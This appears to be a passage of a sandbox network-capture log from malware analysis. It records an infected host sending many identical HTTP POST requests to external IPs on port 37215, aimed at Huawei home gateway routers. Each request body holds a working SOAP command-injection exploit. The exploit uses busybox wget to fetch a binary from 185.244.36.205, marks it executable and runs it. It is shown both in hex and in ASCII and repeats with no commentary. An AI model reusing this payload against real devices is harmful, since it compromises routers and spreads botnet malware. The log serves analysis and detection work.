                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1542192.168.2.1535658186.146.59.13437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.644360065 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1543192.168.2.1555620159.204.237.13637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.644401073 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1544192.168.2.1552734156.80.32.7437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.644402981 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1545192.168.2.154687237.100.170.6837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.644433975 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1546192.168.2.1543890102.161.26.10637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.644443989 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1547192.168.2.1537590133.90.249.13337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.644444942 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1548192.168.2.1533012157.217.228.2137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.644464970 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1549192.168.2.153598037.240.207.16337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.644503117 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1550192.168.2.1536490156.179.63.11637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.644527912 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1551192.168.2.1536838122.1.206.5537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.644536972 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
